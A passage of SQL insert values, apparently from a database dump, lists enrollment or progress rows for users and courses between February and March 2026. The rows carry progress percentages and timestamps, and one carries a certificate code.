(142, 118, 9, '2026-02-01 16:22:02', NULL, 0.00, NULL, '2026-02-01 16:22:02', '2026-02-01 16:22:02', NULL),
(143, 119, 9, '2026-02-01 16:28:47', NULL, 0.00, NULL, '2026-02-01 16:28:47', '2026-02-01 16:28:47', NULL),
(144, 120, 9, '2026-02-01 16:29:24', NULL, 0.00, NULL, '2026-02-01 16:29:24', '2026-02-01 16:29:24', NULL),
(146, 122, 9, '2026-02-01 19:53:59', NULL, 0.00, NULL, '2026-02-01 19:53:59', '2026-02-01 19:53:59', NULL),
(147, 123, 9, '2026-02-02 10:05:56', NULL, 0.00, NULL, '2026-02-02 10:05:56', '2026-02-02 10:05:56', NULL),
(148, 124, 9, '2026-02-02 10:09:50', NULL, 0.00, NULL, '2026-02-02 10:09:50', '2026-02-02 10:09:50', NULL),
(149, 123, 1, '2026-02-02 10:11:30', NULL, 0.00, NULL, '2026-02-02 10:11:30', '2026-02-02 10:11:30', NULL),
(150, 123, 2, '2026-02-02 10:12:22', NULL, 0.00, NULL, '2026-02-02 10:12:22', '2026-02-02 10:12:22', NULL),
(151, 123, 3, '2026-02-02 10:12:59', NULL, 0.00, NULL, '2026-02-02 10:12:59', '2026-02-02 10:12:59', NULL),
(152, 123, 6, '2026-02-02 10:13:39', NULL, 0.00, NULL, '2026-02-02 10:13:39', '2026-02-02 10:13:39', NULL),
(153, 123, 4, '2026-02-02 10:19:47', NULL, 0.00, NULL, '2026-02-02 10:19:47', '2026-02-02 10:19:47', NULL),
(154, 52, 9, '2026-02-02 12:19:48', NULL, 0.00, NULL, '2026-02-02 12:19:48', '2026-02-02 12:19:48', NULL),
(155, 125, 9, '2026-02-04 01:33:45', NULL, 0.00, NULL, '2026-02-04 01:33:45', '2026-02-04 01:33:45', NULL),
(156, 126, 9, '2026-02-04 22:06:04', NULL, 0.00, NULL, '2026-02-04 22:06:04', '2026-02-04 22:06:04', NULL),
(157, 127, 9, '2026-02-05 17:48:43', NULL, 0.00, NULL, '2026-02-05 17:48:43', '2026-02-05 17:48:43', NULL),
(158, 128, 9, '2026-02-07 01:17:18', NULL, 0.00, NULL, '2026-02-07 01:17:18', '2026-02-07 01:17:18', NULL),
(159, 129, 9, '2026-02-07 21:48:41', NULL, 0.00, NULL, '2026-02-07 21:48:41', '2026-02-07 21:48:41', NULL),
(161, 131, 9, '2026-02-08 08:15:26', NULL, 0.00, NULL, '2026-02-08 08:15:26', '2026-02-08 08:15:26', NULL),
(162, 131, 4, '2026-02-08 08:17:46', NULL, 0.00, NULL, '2026-02-08 08:17:46', '2026-02-08 08:17:46', NULL),
(164, 133, 9, '2026-02-08 16:07:41', NULL, 0.00, NULL, '2026-02-08 16:07:41', '2026-02-08 16:07:41', NULL),
(166, 135, 9, '2026-02-08 17:41:33', NULL, 0.00, NULL, '2026-02-08 17:41:33', '2026-02-08 17:41:33', NULL),
(167, 135, 3, '2026-02-08 17:45:33', NULL, 0.00, NULL, '2026-02-08 17:45:33', '2026-02-08 17:45:33', NULL),
(168, 135, 4, '2026-02-08 17:46:37', NULL, 0.00, NULL, '2026-02-08 17:46:37', '2026-02-08 17:46:37', NULL),
(169, 136, 9, '2026-02-09 22:07:24', NULL, 0.00, NULL, '2026-02-09 22:07:24', '2026-02-09 22:07:24', NULL),
(170, 136, 3, '2026-02-09 22:09:38', NULL, 0.00, NULL, '2026-02-09 22:09:38', '2026-02-09 22:09:38', NULL),
(171, 137, 9, '2026-02-10 12:44:43', NULL, 0.00, NULL, '2026-02-10 12:44:43', '2026-02-10 12:44:43', NULL),
(172, 133, 1, '2026-02-11 02:31:45', NULL, 0.00, NULL, '2026-02-11 02:31:45', '2026-02-11 02:31:45', NULL),
(173, 138, 9, '2026-02-11 16:58:57', NULL, 0.00, NULL, '2026-02-11 16:58:57', '2026-02-11 16:58:57', NULL),
(175, 140, 9, '2026-02-11 17:03:12', NULL, 0.00, NULL, '2026-02-11 17:03:12', '2026-02-11 17:03:12', NULL),
(176, 141, 9, '2026-02-12 03:14:49', NULL, 0.00, NULL, '2026-02-12 03:14:49', '2026-02-12 03:14:49', NULL),
(177, 141, 6, '2026-02-12 03:18:24', NULL, 0.00, NULL, '2026-02-12 03:18:24', '2026-02-12 03:18:24', NULL),
(178, 142, 9, '2026-02-14 06:26:32', NULL, 0.00, NULL, '2026-02-14 06:26:32', '2026-02-14 06:26:32', NULL),
(179, 142, 3, '2026-02-14 06:33:56', NULL, 0.00, NULL, '2026-02-14 06:33:56', '2026-02-14 06:33:56', NULL),
(180, 143, 9, '2026-02-14 08:38:18', NULL, 0.00, NULL, '2026-02-14 08:38:18', '2026-02-14 08:38:18', NULL),
(181, 144, 9, '2026-02-14 09:27:26', NULL, 0.00, NULL, '2026-02-14 09:27:26', '2026-02-14 09:27:26', NULL),
(182, 145, 9, '2026-02-14 09:36:58', NULL, 0.00, NULL, '2026-02-14 09:36:58', '2026-02-14 09:36:58', NULL),
(183, 146, 9, '2026-02-14 15:55:19', NULL, 0.00, NULL, '2026-02-14 15:55:19', '2026-02-14 15:55:19', NULL),
(184, 147, 9, '2026-02-14 16:15:23', NULL, 0.00, NULL, '2026-02-14 16:15:23', '2026-02-14 16:15:23', NULL),
(185, 148, 9, '2026-02-14 17:00:19', NULL, 0.00, NULL, '2026-02-14 17:00:19', '2026-02-14 17:00:19', NULL),
(186, 149, 9, '2026-02-14 17:53:22', NULL, 0.00, NULL, '2026-02-14 17:53:22', '2026-02-14 17:53:22', NULL),
(187, 150, 9, '2026-02-14 18:33:41', NULL, 0.00, NULL, '2026-02-14 18:33:41', '2026-02-14 18:33:41', NULL),
(188, 151, 9, '2026-02-14 19:16:08', NULL, 0.00, NULL, '2026-02-14 19:16:08', '2026-02-14 19:16:08', NULL),
(189, 152, 9, '2026-02-15 01:20:19', NULL, 0.00, NULL, '2026-02-15 01:20:19', '2026-02-15 01:20:19', NULL),
(190, 153, 9, '2026-02-15 01:37:03', NULL, 0.00, NULL, '2026-02-15 01:37:03', '2026-02-15 01:37:03', NULL),
(191, 154, 9, '2026-02-15 03:39:55', NULL, 0.00, NULL, '2026-02-15 03:39:55', '2026-02-15 03:39:55', NULL),
(192, 155, 9, '2026-02-15 11:06:24', NULL, 0.00, NULL, '2026-02-15 11:06:24', '2026-02-15 11:06:24', NULL),
(193, 156, 9, '2026-02-15 20:43:33', NULL, 0.00, NULL, '2026-02-15 20:43:33', '2026-02-15 20:43:33', NULL),
(194, 157, 9, '2026-02-15 21:26:25', NULL, 0.00, NULL, '2026-02-15 21:26:25', '2026-02-15 21:26:25', NULL),
(195, 158, 9, '2026-02-15 23:19:10', NULL, 0.00, NULL, '2026-02-15 23:19:10', '2026-02-15 23:19:10', NULL),
(196, 159, 9, '2026-02-15 23:22:18', NULL, 0.00, NULL, '2026-02-15 23:22:18', '2026-02-15 23:22:18', NULL),
(197, 159, 1, '2026-02-15 23:23:40', NULL, 0.00, NULL, '2026-02-15 23:23:40', '2026-02-15 23:23:40', NULL),
(198, 160, 9, '2026-02-15 23:40:38', NULL, 0.00, NULL, '2026-02-15 23:40:38', '2026-02-15 23:40:38', NULL),
(200, 162, 9, '2026-02-16 12:06:12', NULL, 0.00, NULL, '2026-02-16 12:06:12', '2026-02-16 12:06:12', NULL),
(201, 163, 9, '2026-02-16 12:22:16', NULL, 0.00, NULL, '2026-02-16 12:22:16', '2026-02-16 12:22:16', NULL),
(202, 164, 9, '2026-02-16 14:54:11', NULL, 0.00, NULL, '2026-02-16 14:54:11', '2026-02-16 14:54:11', NULL),
(203, 165, 9, '2026-02-16 17:14:50', NULL, 0.00, NULL, '2026-02-16 17:14:50', '2026-02-16 17:14:50', NULL),
(204, 165, 1, '2026-02-16 17:41:43', NULL, 0.00, NULL, '2026-02-16 17:41:43', '2026-02-16 17:41:43', NULL),
(205, 166, 9, '2026-02-17 15:29:04', NULL, 0.00, NULL, '2026-02-17 15:29:04', '2026-02-17 15:29:04', NULL),
(206, 168, 9, '2026-02-18 06:47:45', NULL, 0.00, NULL, '2026-02-18 06:47:45', '2026-02-18 06:47:45', NULL),
(207, 169, 9, '2026-02-18 07:15:42', NULL, 0.00, NULL, '2026-02-18 07:15:42', '2026-02-18 07:15:42', NULL),
(208, 170, 9, '2026-02-18 08:18:30', NULL, 0.00, NULL, '2026-02-18 08:18:30', '2026-02-18 08:18:30', NULL),
(209, 171, 9, '2026-02-18 09:48:53', NULL, 0.00, NULL, '2026-02-18 09:48:53', '2026-02-18 09:48:53', NULL),
(210, 172, 9, '2026-02-18 11:05:56', NULL, 0.00, NULL, '2026-02-18 11:05:56', '2026-02-18 11:05:56', NULL),
(211, 173, 9, '2026-02-18 12:12:57', NULL, 0.00, NULL, '2026-02-18 12:12:57', '2026-02-18 12:12:57', NULL),
(212, 174, 9, '2026-02-18 15:07:07', NULL, 0.00, NULL, '2026-02-18 15:07:07', '2026-02-18 15:07:07', NULL),
(213, 175, 9, '2026-02-18 15:40:00', NULL, 0.00, NULL, '2026-02-18 15:40:00', '2026-02-18 15:40:00', NULL),
(214, 176, 9, '2026-02-19 03:47:10', NULL, 0.00, NULL, '2026-02-19 03:47:10', '2026-02-19 03:47:10', NULL),
(215, 177, 9, '2026-02-19 04:01:42', NULL, 0.00, NULL, '2026-02-19 04:01:42', '2026-02-19 04:01:42', NULL),
(216, 178, 9, '2026-02-19 05:19:11', NULL, 0.00, NULL, '2026-02-19 05:19:11', '2026-02-19 05:19:11', NULL),
(217, 178, 1, '2026-02-19 05:24:13', NULL, 0.00, NULL, '2026-02-19 05:24:13', '2026-02-19 05:24:13', NULL),
(218, 179, 9, '2026-02-19 12:58:33', NULL, 0.00, NULL, '2026-02-19 12:58:33', '2026-02-19 12:58:33', NULL),
(219, 180, 9, '2026-02-19 15:44:04', NULL, 0.00, NULL, '2026-02-19 15:44:04', '2026-02-19 15:44:04', NULL),
(220, 181, 9, '2026-02-20 02:32:46', NULL, 0.00, NULL, '2026-02-20 02:32:46', '2026-02-20 02:32:46', NULL),
(221, 181, 1, '2026-02-20 03:06:51', NULL, 0.00, NULL, '2026-02-20 03:06:51', '2026-02-20 03:06:51', NULL),
(222, 182, 9, '2026-02-20 03:10:13', NULL, 0.00, NULL, '2026-02-20 03:10:13', '2026-02-20 03:10:13', NULL),
(223, 183, 9, '2026-02-20 03:54:43', NULL, 0.00, NULL, '2026-02-20 03:54:43', '2026-02-20 03:54:43', NULL),
(224, 183, 1, '2026-02-20 04:02:30', NULL, 0.00, NULL, '2026-02-20 04:02:30', '2026-02-20 04:02:30', NULL),
(225, 183, 2, '2026-02-20 04:02:34', NULL, 1.54, NULL, '2026-02-20 04:02:34', '2026-02-20 04:23:32', NULL),
(226, 183, 3, '2026-02-20 04:26:10', NULL, 0.00, NULL, '2026-02-20 04:26:10', '2026-02-20 04:26:10', NULL),
(227, 184, 9, '2026-02-20 07:52:51', NULL, 0.00, NULL, '2026-02-20 07:52:51', '2026-02-20 07:52:51', NULL),
(228, 185, 9, '2026-02-20 08:58:17', NULL, 0.00, NULL, '2026-02-20 08:58:17', '2026-02-20 08:58:17', NULL),
(229, 186, 9, '2026-02-20 16:30:37', NULL, 0.00, NULL, '2026-02-20 16:30:37', '2026-02-20 16:30:37', NULL),
(230, 187, 9, '2026-02-21 03:05:53', NULL, 0.00, NULL, '2026-02-21 03:05:53', '2026-02-21 03:05:53', NULL),
(231, 188, 9, '2026-02-21 15:36:57', NULL, 0.00, NULL, '2026-02-21 15:36:57', '2026-02-21 15:36:57', NULL),
(232, 189, 9, '2026-02-21 18:33:56', NULL, 0.00, NULL, '2026-02-21 18:33:56', '2026-02-21 18:33:56', NULL),
(233, 189, 1, '2026-02-21 19:53:45', NULL, 0.00, NULL, '2026-02-21 19:53:45', '2026-02-21 19:53:45', NULL),
(235, 191, 9, '2026-02-22 01:39:29', NULL, 0.00, NULL, '2026-02-22 01:39:29', '2026-02-22 01:39:29', NULL),
(236, 192, 9, '2026-02-22 08:26:25', NULL, 0.00, NULL, '2026-02-22 08:26:25', '2026-02-22 08:26:25', NULL),
(237, 177, 1, '2026-02-22 11:25:18', NULL, 0.00, NULL, '2026-02-22 11:25:18', '2026-02-22 11:25:18', NULL),
(238, 193, 9, '2026-02-22 18:24:05', NULL, 0.00, NULL, '2026-02-22 18:24:05', '2026-02-22 18:24:05', NULL),
(239, 194, 9, '2026-02-23 03:17:17', NULL, 0.00, NULL, '2026-02-23 03:17:17', '2026-02-23 03:17:17', NULL),
(240, 195, 9, '2026-02-23 16:00:42', NULL, 0.00, NULL, '2026-02-23 16:00:42', '2026-02-23 16:00:42', NULL),
(241, 196, 9, '2026-02-23 17:35:00', NULL, 0.00, NULL, '2026-02-23 17:35:00', '2026-02-23 17:35:00', NULL),
(242, 197, 9, '2026-02-23 18:53:21', NULL, 0.00, NULL, '2026-02-23 18:53:21', '2026-02-23 18:53:21', NULL),
(243, 198, 9, '2026-02-23 23:51:02', NULL, 0.00, NULL, '2026-02-23 23:51:02', '2026-02-23 23:51:02', NULL),
(244, 199, 9, '2026-02-23 23:52:04', NULL, 0.00, NULL, '2026-02-23 23:52:04', '2026-02-23 23:52:04', NULL),
(245, 200, 9, '2026-02-24 03:27:34', NULL, 0.00, NULL, '2026-02-24 03:27:34', '2026-02-24 03:27:34', NULL),
(246, 201, 9, '2026-02-24 07:41:32', NULL, 0.00, NULL, '2026-02-24 07:41:32', '2026-02-24 07:41:32', NULL),
(247, 202, 9, '2026-02-24 15:31:22', NULL, 0.00, NULL, '2026-02-24 15:31:22', '2026-02-24 15:31:22', NULL),
(248, 203, 9, '2026-02-24 19:39:57', NULL, 0.00, NULL, '2026-02-24 19:39:57', '2026-02-24 19:39:57', NULL),
(249, 204, 9, '2026-02-24 20:47:36', NULL, 0.00, NULL, '2026-02-24 20:47:36', '2026-02-24 20:47:36', NULL),
(250, 205, 9, '2026-02-24 21:22:17', NULL, 0.00, NULL, '2026-02-24 21:22:17', '2026-02-24 21:22:17', NULL),
(253, 208, 9, '2026-02-25 10:19:29', NULL, 0.00, NULL, '2026-02-25 10:19:29', '2026-02-25 10:19:29', NULL),
(254, 209, 9, '2026-02-25 11:04:34', NULL, 0.00, NULL, '2026-02-25 11:04:34', '2026-02-25 11:04:34', NULL),
(255, 210, 9, '2026-02-25 20:27:57', NULL, 0.00, NULL, '2026-02-25 20:27:57', '2026-02-25 20:27:57', NULL),
(256, 211, 9, '2026-02-26 20:39:12', NULL, 0.00, NULL, '2026-02-26 20:39:12', '2026-02-26 20:39:12', NULL),
(257, 212, 9, '2026-02-26 20:55:14', NULL, 0.00, NULL, '2026-02-26 20:55:14', '2026-02-26 20:55:14', NULL),
(258, 213, 9, '2026-02-26 21:11:00', NULL, 0.00, NULL, '2026-02-26 21:11:00', '2026-02-26 21:11:00', NULL),
(259, 213, 2, '2026-02-26 21:13:14', NULL, 0.00, NULL, '2026-02-26 21:13:14', '2026-02-26 21:13:14', NULL),
(260, 210, 1, '2026-02-26 21:39:28', NULL, 0.00, NULL, '2026-02-26 21:39:28', '2026-02-26 21:39:28', NULL),
(261, 214, 9, '2026-02-27 05:56:28', NULL, 0.00, NULL, '2026-02-27 05:56:28', '2026-02-27 05:56:28', NULL),
(262, 214, 3, '2026-02-27 06:16:03', NULL, 0.00, NULL, '2026-02-27 06:16:03', '2026-02-27 06:16:03', NULL),
(263, 214, 2, '2026-02-27 06:17:51', NULL, 3.08, NULL, '2026-02-27 06:17:51', '2026-02-27 06:36:08', NULL),
(264, 196, 1, '2026-02-27 07:09:07', NULL, 0.00, NULL, '2026-02-27 07:09:07', '2026-02-27 07:09:07', NULL),
(266, 216, 9, '2026-02-27 16:15:13', NULL, 0.00, NULL, '2026-02-27 16:15:13', '2026-02-27 16:15:13', NULL),
(267, 217, 9, '2026-02-27 23:39:31', NULL, 0.00, NULL, '2026-02-27 23:39:31', '2026-02-27 23:39:31', NULL),
(269, 219, 9, '2026-02-28 10:30:03', NULL, 0.00, NULL, '2026-02-28 10:30:03', '2026-02-28 10:30:03', NULL),
(270, 220, 9, '2026-02-28 10:37:15', NULL, 0.00, NULL, '2026-02-28 10:37:15', '2026-02-28 10:37:15', NULL),
(271, 221, 9, '2026-03-01 01:54:18', NULL, 0.00, NULL, '2026-03-01 01:54:18', '2026-03-01 01:54:18', NULL),
(272, 217, 1, '2026-03-01 03:18:44', NULL, 0.00, NULL, '2026-03-01 03:18:44', '2026-03-01 03:18:44', NULL),
(274, 223, 9, '2026-03-01 15:34:14', NULL, 0.00, NULL, '2026-03-01 15:34:14', '2026-03-01 15:34:14', NULL),
(275, 224, 9, '2026-03-01 15:54:51', NULL, 0.00, NULL, '2026-03-01 15:54:51', '2026-03-01 15:54:51', NULL),
(276, 225, 9, '2026-03-02 00:57:40', NULL, 72.73, NULL, '2026-03-02 00:57:40', '2026-03-16 03:19:04', NULL),
(277, 226, 9, '2026-03-02 05:26:25', NULL, 0.00, NULL, '2026-03-02 05:26:25', '2026-03-02 05:26:25', NULL),
(278, 225, 1, '2026-03-02 05:30:47', NULL, 71.43, NULL, '2026-03-02 05:30:47', '2026-03-13 02:43:55', NULL),
(279, 227, 9, '2026-03-02 08:22:43', NULL, 0.00, NULL, '2026-03-02 08:22:43', '2026-03-02 08:22:43', NULL),
(280, 225, 4, '2026-03-02 09:37:53', NULL, 0.00, NULL, '2026-03-02 09:37:53', '2026-03-02 09:37:53', NULL),
(281, 225, 3, '2026-03-02 09:38:06', NULL, 0.00, NULL, '2026-03-02 09:38:06', '2026-03-02 09:38:06', NULL),
(282, 228, 9, '2026-03-02 11:52:47', NULL, 0.00, NULL, '2026-03-02 11:52:47', '2026-03-02 11:52:47', NULL),
(283, 229, 9, '2026-03-02 14:11:53', NULL, 0.00, NULL, '2026-03-02 14:11:53', '2026-03-02 14:11:53', NULL),
(284, 230, 9, '2026-03-02 16:47:27', NULL, 0.00, NULL, '2026-03-02 16:47:27', '2026-03-02 16:47:27', NULL),
(285, 231, 9, '2026-03-02 20:15:36', NULL, 0.00, NULL, '2026-03-02 20:15:36', '2026-03-02 20:15:36', NULL),
(286, 232, 9, '2026-03-03 02:53:13', NULL, 0.00, NULL, '2026-03-03 02:53:13', '2026-03-03 02:53:13', NULL),
(287, 232, 3, '2026-03-03 03:16:14', '2026-03-14 05:05:01', 100.00, NULL, '2026-03-03 03:16:14', '2026-03-14 05:05:01', 'CERT-2026-3-232-RFM0UC'),
(288, 178, 4, '2026-03-03 08:48:25', NULL, 0.00, NULL, '2026-03-03 08:48:25', '2026-03-03 08:48:25', NULL),
(289, 233, 9, '2026-03-03 09:48:22', NULL, 0.00, NULL, '2026-03-03 09:48:22', '2026-03-03 09:48:22', NULL),
(290, 233, 3, '2026-03-03 12:17:44', NULL, 0.00, NULL, '2026-03-03 12:17:44', '2026-03-03 12:17:44', NULL),
(291, 56, 3, '2026-03-03 15:59:27', NULL, 0.00, NULL, '2026-03-03 15:59:27', '2026-03-03 15:59:27', NULL),
(292, 56, 1, '2026-03-03 16:08:40', NULL, 0.00, NULL, '2026-03-03 16:08:40', '2026-03-03 16:08:40', NULL),
(293, 234, 9, '2026-03-03 19:38:59', NULL, 0.00, NULL, '2026-03-03 19:38:59', '2026-03-03 19:38:59', NULL),
(294, 235, 9, '2026-03-03 20:12:50', NULL, 0.00, NULL, '2026-03-03 20:12:50', '2026-03-03 20:12:50', NULL),
(295, 236, 9, '2026-03-03 22:19:10', NULL, 0.00, NULL, '2026-03-03 22:19:10', '2026-03-03 22:19:10', NULL),
(296, 237, 9, '2026-03-03 23:24:37', NULL, 0.00, NULL, '2026-03-03 23:24:37', '2026-03-03 23:24:37', NULL),
(297, 238, 9, '2026-03-04 04:10:29', NULL, 0.00, NULL, '2026-03-04 04:10:29', '2026-03-04 04:10:29', NULL),
(299, 240, 9, '2026-03-04 09:32:20', NULL, 0.00, NULL, '2026-03-04 09:32:20', '2026-03-04 09:32:20', NULL),
(300, 237, 1, '2026-03-04 16:19:50', NULL, 2.38, NULL, '2026-03-04 16:19:50', '2026-03-04 16:20:30', NULL),
(301, 241, 9, '2026-03-04 16:21:57', NULL, 0.00, NULL, '2026-03-04 16:21:57', '2026-03-04 16:21:57', NULL),
(302, 241, 1, '2026-03-04 16:24:48', NULL, 0.00, NULL, '2026-03-04 16:24:48', '2026-03-04 16:24:48', NULL),
(303, 242, 9, '2026-03-04 19:32:49', NULL, 0.00, NULL, '2026-03-04 19:32:49', '2026-03-04 19:32:49', NULL),
(304, 243, 9, '2026-03-04 19:33:27', NULL, 0.00, NULL, '2026-03-04 19:33:27', '2026-03-04 19:33:27', NULL),
(305, 244, 9, '2026-03-04 20:19:49', NULL, 0.00, NULL, '2026-03-04 20:19:49', '2026-03-04 20:19:49', NULL),
(306, 245, 9, '2026-03-05 04:55:26', NULL, 0.00, NULL, '2026-03-05 04:55:26', '2026-03-05 04:55:26', NULL),
(307, 245, 1, '2026-03-05 04:57:08', NULL, 0.00, NULL, '2026-03-05 04:57:08', '2026-03-05 04:57:08', NULL),
(308, 246, 9, '2026-03-05 07:48:31', NULL, 0.00, NULL, '2026-03-05 07:48:31', '2026-03-05 07:48:31', NULL),
(309, 246, 2, '2026-03-05 09:42:12', NULL, 0.00, NULL, '2026-03-05 09:42:12', '2026-03-05 09:42:12', NULL),
(310, 246, 3, '2026-03-05 10:33:39', NULL, 0.00, NULL, '2026-03-05 10:33:39', '2026-03-05 10:33:39', NULL),
(311, 247, 9, '2026-03-05 11:37:07', NULL, 0.00, NULL, '2026-03-05 11:37:07', '2026-03-05 11:37:07', NULL),
(312, 248, 9, '2026-03-05 17:39:47', NULL, 0.00, NULL, '2026-03-05 17:39:47', '2026-03-05 17:39:47', NULL),
(313, 248, 1, '2026-03-05 17:42:14', NULL, 0.00, NULL, '2026-03-05 17:42:14', '2026-03-05 17:42:14', NULL),
(315, 195, 3, '2026-03-05 21:30:13', NULL, 0.00, NULL, '2026-03-05 21:30:13', '2026-03-05 21:30:13', NULL),
(316, 250, 9, '2026-03-06 02:52:53', NULL, 0.00, NULL, '2026-03-06 02:52:53', '2026-03-06 02:52:53', NULL),
(317, 250, 1, '2026-03-06 02:53:50', NULL, 0.00, NULL, '2026-03-06 02:53:50', '2026-03-06 02:53:50', NULL),
(318, 251, 9, '2026-03-06 04:45:11', NULL, 0.00, NULL, '2026-03-06 04:45:11', '2026-03-06 04:45:11', NULL),
(319, 251, 3, '2026-03-06 04:48:38', NULL, 0.00, NULL, '2026-03-06 04:48:38', '2026-03-06 04:48:38', NULL),
(321, 253, 9, '2026-03-06 05:02:06', NULL, 0.00, NULL, '2026-03-06 05:02:06', '2026-03-06 05:02:06', NULL),
(322, 254, 9, '2026-03-06 07:04:37', NULL, 0.00, NULL, '2026-03-06 07:04:37', '2026-03-06 07:04:37', NULL),
(324, 256, 9, '2026-03-06 08:25:32', NULL, 0.00, NULL, '2026-03-06 08:25:32', '2026-03-06 08:25:32', NULL),
(325, 257, 9, '2026-03-06 10:11:34', NULL, 0.00, NULL, '2026-03-06 10:11:34', '2026-03-06 10:11:34', NULL),
(326, 258, 9, '2026-03-06 15:19:10', NULL, 0.00, NULL, '2026-03-06 15:19:10', '2026-03-06 15:19:10', NULL),
(327, 259, 9, '2026-03-06 21:08:23', NULL, 0.00, NULL, '2026-03-06 21:08:23', '2026-03-06 21:08:23', NULL),
(328, 232, 4, '2026-03-07 08:08:49', NULL, 11.11, NULL, '2026-03-07 08:08:49', '2026-03-15 18:20:01', NULL),
(329, 260, 9, '2026-03-07 08:24:52', NULL, 0.00, NULL, '2026-03-07 08:24:52', '2026-03-07 08:24:52', NULL),
(330, 261, 9, '2026-03-07 08:27:43', NULL, 0.00, NULL, '2026-03-07 08:27:43', '2026-03-07 08:27:43', NULL),
(331, 261, 1, '2026-03-07 08:30:35', NULL, 0.00, NULL, '2026-03-07 08:30:35', '2026-03-07 08:30:35', NULL),
(332, 260, 1, '2026-03-07 10:24:49', NULL, 52.38, NULL, '2026-03-07 10:24:49', '2026-03-15 21:27:59', NULL),
(334, 262, 9, '2026-03-08 18:31:42', NULL, 0.00, NULL, '2026-03-08 18:31:42', '2026-03-08 18:31:42', NULL),
(335, 263, 9, '2026-03-08 22:30:57', NULL, 0.00, NULL, '2026-03-08 22:30:57', '2026-03-08 22:30:57', NULL),
(336, 225, 2, '2026-03-09 02:50:08', NULL, 0.00, NULL, '2026-03-09 02:50:08', '2026-03-09 02:50:08', NULL),
(337, 225, 6, '2026-03-09 02:50:16', NULL, 0.00, NULL, '2026-03-09 02:50:16', '2026-03-09 02:50:16', NULL),
(338, 264, 9, '2026-03-09 09:41:21', NULL, 0.00, NULL, '2026-03-09 09:41:21', '2026-03-09 09:41:21', NULL),
(339, 265, 9, '2026-03-09 11:10:00', NULL, 0.00, NULL, '2026-03-09 11:10:00', '2026-03-09 11:10:00', NULL),
(340, 266, 9, '2026-03-09 12:09:24', NULL, 0.00, NULL, '2026-03-09 12:09:24', '2026-03-09 12:09:24', NULL),
(341, 267, 9, '2026-03-09 19:38:54', NULL, 0.00, NULL, '2026-03-09 19:38:54', '2026-03-09 19:38:54', NULL),
(342, 1, 11, '2026-03-09 22:40:28', NULL, 0.00, NULL, '2026-03-09 22:40:28', '2026-03-09 22:40:28', NULL),
(343, 268, 9, '2026-03-09 23:49:10', NULL, 0.00, NULL, '2026-03-09 23:49:10', '2026-03-09 23:49:10', NULL),
(344, 269, 9, '2026-03-10 03:37:12', NULL, 0.00, NULL, '2026-03-10 03:37:12', '2026-03-10 03:37:12', NULL),
(345, 270, 9, '2026-03-10 04:25:32', NULL, 0.00, NULL, '2026-03-10 04:25:32', '2026-03-10 04:25:32', NULL),
(346, 271, 9, '2026-03-10 05:08:00', NULL, 0.00, NULL, '2026-03-10 05:08:00', '2026-03-10 05:08:00', NULL),
(347, 272, 9, '2026-03-10 11:07:44', NULL, 0.00, NULL, '2026-03-10 11:07:44', '2026-03-10 11:07:44', NULL),
(348, 273, 9, '2026-03-10 13:55:17', NULL, 0.00, NULL, '2026-03-10 13:55:17', '2026-03-10 13:55:17', NULL),
(349, 274, 9, '2026-03-10 20:57:36', NULL, 0.00, NULL, '2026-03-10 20:57:36', '2026-03-10 20:57:36', NULL),
(350, 275, 9, '2026-03-11 02:54:27', NULL, 0.00, NULL, '2026-03-11 02:54:27', '2026-03-11 02:54:27', NULL),
(351, 276, 9, '2026-03-11 08:19:33', NULL, 0.00, NULL, '2026-03-11 08:19:33', '2026-03-11 08:19:33', NULL),
(352, 277, 9, '2026-03-11 11:43:14', NULL, 0.00, NULL, '2026-03-11 11:43:14', '2026-03-11 11:43:14', NULL),
(353, 195, 12, '2026-03-11 12:10:55', NULL, 0.00, NULL, '2026-03-11 12:10:55', '2026-03-11 12:10:55', NULL),
(354, 278, 9, '2026-03-11 13:28:03', NULL, 0.00, NULL, '2026-03-11 13:28:03', '2026-03-11 13:28:03', NULL),
(355, 279, 9, '2026-03-11 13:41:13', NULL, 0.00, NULL, '2026-03-11 13:41:13', '2026-03-11 13:41:13', NULL),
(357, 281, 9, '2026-03-11 22:36:21', NULL, 0.00, NULL, '2026-03-11 22:36:21', '2026-03-11 22:36:21', NULL),
(358, 282, 9, '2026-03-11 23:46:33', NULL, 0.00, NULL, '2026-03-11 23:46:33', '2026-03-11 23:46:33', NULL),
(359, 283, 9, '2026-03-11 23:57:49', NULL, 63.64, NULL, '2026-03-11 23:57:49', '2026-03-12 21:48:00', NULL),
(360, 284, 9, '2026-03-12 04:41:54', NULL, 0.00, NULL, '2026-03-12 04:41:54', '2026-03-12 04:41:54', NULL),
(361, 285, 9, '2026-03-12 07:19:13', NULL, 0.00, NULL, '2026-03-12 07:19:13', '2026-03-12 07:19:13', NULL),
(362, 286, 9, '2026-03-12 07:27:07', NULL, 0.00, NULL, '2026-03-12 07:27:07', '2026-03-12 07:27:07', NULL),
(363, 261, 3, '2026-03-12 08:32:49', NULL, 0.00, NULL, '2026-03-12 08:32:49', '2026-03-12 08:32:49', NULL),
(364, 287, 9, '2026-03-12 08:34:57', NULL, 0.00, NULL, '2026-03-12 08:34:57', '2026-03-12 08:34:57', NULL),
(365, 288, 9, '2026-03-12 09:30:45', NULL, 0.00, NULL, '2026-03-12 09:30:45', '2026-03-12 09:30:45', NULL),
(366, 42, 2, '2026-03-12 09:48:16', NULL, 0.00, NULL, '2026-03-12 09:48:16', '2026-03-12 09:48:16', NULL),
(367, 289, 9, '2026-03-12 10:05:41', NULL, 0.00, NULL, '2026-03-12 10:05:41', '2026-03-12 10:05:41', NULL),
(368, 42, 9, '2026-03-12 11:32:05', NULL, 9.09, NULL, '2026-03-12 11:32:05', '2026-03-12 11:48:00', NULL),
(369, 290, 9, '2026-03-12 13:49:36', NULL, 0.00, NULL, '2026-03-12 13:49:36', '2026-03-12 13:49:36', NULL),
(370, 287, 3, '2026-03-12 16:33:13', NULL, 0.00, NULL, '2026-03-12 16:33:13', '2026-03-12 16:33:13', NULL),
(371, 291, 9, '2026-03-13 00:33:30', NULL, 0.00, NULL, '2026-03-13 00:33:30', '2026-03-13 00:33:30', NULL),
(372, 292, 9, '2026-03-13 09:01:21', NULL, 0.00, NULL, '2026-03-13 09:01:21', '2026-03-13 09:01:21', NULL),
(374, 294, 9, '2026-03-14 04:14:32', NULL, 0.00, NULL, '2026-03-14 04:14:32', '2026-03-14 04:14:32', NULL),
(375, 232, 6, '2026-03-14 05:14:01', NULL, 0.00, NULL, '2026-03-14 05:14:01', '2026-03-14 05:14:01', NULL),
(376, 295, 9, '2026-03-14 06:24:01', NULL, 0.00, NULL, '2026-03-14 06:24:01', '2026-03-14 06:24:01', NULL),
(377, 296, 9, '2026-03-14 16:24:37', NULL, 0.00, NULL, '2026-03-14 16:24:37', '2026-03-14 16:24:37', NULL),
